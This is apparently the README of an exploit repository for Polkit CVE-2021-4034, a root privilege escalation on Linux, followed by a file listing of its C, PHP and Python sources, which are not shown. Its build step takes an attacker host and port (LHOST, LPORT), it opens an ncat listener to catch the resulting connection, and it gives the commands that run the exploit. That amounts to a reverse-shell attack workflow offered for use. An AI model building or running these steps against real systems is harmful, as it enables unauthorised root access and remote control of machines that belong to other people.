Polkit CVE-2021-4034 exploitation in High-Level Programming Language# Polkit-CVE-2021-4034-HLP
Polkit CVE-2021-4034 exploitation in High-Level Programming Language
## Build
```
make LHOST=ip.or.domain.tld LPORT=8000
```
## Usage
Open TCP port listener, example with `ncat` on loopback
```
ncat -vl 127.0.0.1 8000
```
Run exploit
```
php ${ARCH}_exploit.php
python ${ARCH}_exploit.py
```
[4.0K] /data/pocs/e2876ec392e81b884d1373cfd00ecc6a969b9ed8
├── [2.7K] exploit.c
├── [ 917] exploit.php.in
├── [ 814] exploit.py.in
├── [ 34K] LICENSE
├── [1.3K] Makefile
└── [ 323] README.md
0 directories, 6 files